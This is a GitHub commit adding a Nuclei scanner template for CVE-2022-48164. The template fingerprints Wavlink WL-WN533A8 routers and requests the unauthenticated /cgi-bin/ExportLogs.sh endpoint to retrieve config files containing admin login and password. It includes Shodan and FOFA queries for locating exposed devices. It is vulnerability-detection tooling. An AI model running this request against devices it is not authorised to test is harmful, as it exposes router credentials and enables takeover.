Merge pull request #11155 from projectdiscovery/CVE-2022-48164

Create CVE-2022-48164.yaml
patch-15
Dhiyaneshwaran 2024-11-18 22:51:59 +05:30 committed by GitHub
commit 3373f2b7b5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 50 additions and 0 deletions

View File

@ -0,0 +1,50 @@
id: CVE-2022-48164
info:
name: Wavlink WL-WN533A8 M33A8.V5030.190716 - Information Disclosure
author: ritikchaddha
severity: high
description: |
An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN533A8 M33A8.V5030.190716 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.
impact: |
Successful exploitation could lead to sensitive information disclosure.
reference:
- https://docs.google.com/document/d/1JgqpBYRxyU0WKDSqkvi4Yo0723k7mrIUeuH9i1eEs8U/edit?tab=t.0
- https://nvd.nist.gov/vuln/detail/CVE-2022-48164
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-48164
cpe: cpe:2.3:o:wavlink:wl-wn533a8_firmware:m33a8.v5030.190716:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wavlink
product: wl-wn533a8_firmware
shodan-query: html:"WN533A8"
fofa-query: body="WN533A8"
tags: cve,cve2022,wavlink,exposure,wn533a8
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'contains(body, "WN533A8")'
internal: true
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportLogs.sh"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Login=", "Password=", "WiFi_", "WAVLINK")'
- 'contains(content_type, "application/octet-stream")'
- 'status_code == 200'
condition: and